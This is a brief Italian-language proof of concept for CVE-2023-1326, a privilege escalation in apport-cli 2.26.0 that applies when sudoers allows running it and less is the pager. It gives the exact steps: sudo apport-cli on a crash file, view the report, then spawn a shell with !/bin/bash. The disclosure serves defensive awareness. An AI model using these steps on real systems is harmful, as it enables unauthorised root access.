
Una prova di concetto per CVE-2023–1326 in apport-cli 2.26.0
Questa vulnerabilità è un'escalation dei privilegi in apport-cli 2.26.0, simile a CVE-2023–26604, questa vulnerabilità funziona solo se assegnata in sudoers:

Un attacco di escalation dei privilegi è stato riscontrato in apport-cli 2.26.0 e versioni precedenti, simile a CVE-2023-26604. Se un sistema è appositamente configurato per consentire a utenti non privilegiati di eseguire sudo apport-cli, less è configurato come pager e la dimensione del terminale può essere impostata: un attaccante locale può elevare i privilegi.
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
